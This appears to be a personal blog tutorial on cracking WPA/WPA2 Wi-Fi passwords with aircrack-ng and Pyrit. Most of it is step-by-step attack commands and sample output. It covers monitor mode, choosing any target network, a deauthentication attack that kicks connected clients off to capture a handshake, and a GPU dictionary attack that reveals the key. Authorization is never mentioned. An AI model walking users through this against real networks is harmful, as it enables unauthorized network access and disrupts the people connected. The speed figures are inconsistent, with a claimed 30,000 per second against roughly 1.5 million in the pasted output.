How to Bruteforce WPA/WPA2 with Pyrit (Tutorial)

In this tutorial you will learn how to bruteforce WPA/WPA2. Bruteforcing a password can be very difficult and takes a lot of time, despite of the process being possible, cracking the password with Bruteforcing its simply and in one word,
IMPOSSIBLE. But why?

Well lets start with the basics and lets say you are trying to bruteforce a password of 3 characters from A-Z with an average speed of 1000 passwords per second, the time bruteforcing the password would be less than a minute. The problem is that WPA passwords
are 8 characters long so lets see the stats quickly:

4 Characters: 8 minutes
5 Characters: 4 hours
6 Characters: 4 days
7 Characters: 4 months (still doable)
8 Characters: 7 years =)
Funny right? Yes, 7 years to crack one password. Unless your life depends on it, just please give up and go on with your life! You can check this

here.

We can accelerate the process!

Yes of course we can. We can do this with Backtrack by installing the latest driver for your Graphics Card,
OpenCL or CUDA (depending on your Graphics Card Brand) and Pyrit. Pyrit let us use the power of our Graphics Card to crack the password, it´s like an Aircrack with turbo. On my case using a Laptop with a Radeon HD 6850m 1 GB,
I could reach 30.000 passwords per second. 30 times more than with aircrack but dont be surprised, there are some beasts out there who can reach 100,000 passwords/second.

Installing all the necessary to use Pyrit is a little bit complicated and I will try to make an Installation Guide some day.

So you have Backtrack? Drivers? Pyrit? Want to try just for pure curiosity?

How To Bruteforce WPA/WPA2 Tutorial With Backtrack and Pyrit

What you will need:

Backtrack / Kali
Proper Graphic Cards Drivers
OpenCl / CUDA
Pyrit
1. First we need to get your NetworkCard on monitor mode:

airmon-ng start wlan0

2. Then run airodump-ng to see all available Wireless Networks:

airodump-ng mon0

3. Now we pick our target and copy all details (ESSID, BSSID and Channel). When you have this data close airodump and run it again with the target:

airodump-ng --bssid (BSSID HERE) -c (CHANNEL NUMBER) -w (ESSID HERE)

4. Now you can wait for a Handshake or make one depending if someone is connected to the Network. In case someone is connected, use deauthentication:

aireplay-ng -0 10 -a (BSSID HERE) -c (MAC ADDRES OF THE PC CONNECTED)

5. Once you got the Handshake, close airodump, open a new terminal and test the handshake with pyrit:

pyrit -r (HANDSHAKE NAME HERE).cap analyze

Now you should see something like this, indicating a Handshake has been found on the file you analyzed:

Pyrit 0.3.0 (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+

Parsing file 'wpapsk-linksys.dump.gz' (1/1)...
587 packets (587 802.11-packets), 1 APs

#1: AccessPoint 00:0b:86:c2:a4:85 ('linksys')
  #0: Station 00:13:ce:55:98:ef, handshake found
  #1: Station 01:00:5e:7f:ff:fa
  #2: Station 01:00:5e:00:00:16

6. Great! Now you can proceed to reveal the password. Before we go on, you should know pyrit has some important feature. One of these features is that you can import many dictionaries to the database. That means you can create a very big passwords list for
any handshake you have! Let’s do it! Write:

pyrit eval

7. This will show you how many passwords are in the database. As you can notice, there are currently no passwords. Let´s import them to the database:

pyrit -i (DICTIONARY NAME).(FORMAT HERE) import_passwords

Remember that the format may vary, some dictionaries are for example in .txt format. Right the name and the format correctly!
Now Pyrit should work on the database:

Connecting to storage at 'file://'...  connected.
10202 lines read. Flushing buffers...
All done.

8. Now we have to create an ESSID. Pyrits needs a name for the network you are attacking, just write the Essid of the network you are attacking:

pyrit -e linksys create_essid

Run “pyrit eval” to see the status. The passwords count appears and the name of the ESSID. Perfect!
9. Now we need to batch-process the database. This will save you time and increase the cracking speed of the password.

pyrit batch

Attacking the Handshare with Pyrit Database

pyrit -r (handshakename).cap attack_db

 

Pyrit 0.3.0 (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+

Connecting to storage at 'file://'...  connected.
Parsing file 'wpapsk-linksys.dump.gz' (1/1)...
587 packets (587 802.11-packets), 1 APs

Picked AccessPoint 00:0b:86:c2:a4:85 ('linksys') automatically.
Attacking handshake with Station 00:13:ce:55:98:ef...
Tried 1639 PMKs so far (39.8%); 1577435 PMKs per second.

The password is 'dictionary'.

I hope this Tutorial was useful! If you have any questions, suggestions or comments, feel free to comment below!
Thanks and have fun!
https://richardleo.wordpress.com/2014/02/04/how-to-bruteforce-wpawpa2-pyrit-tutorial/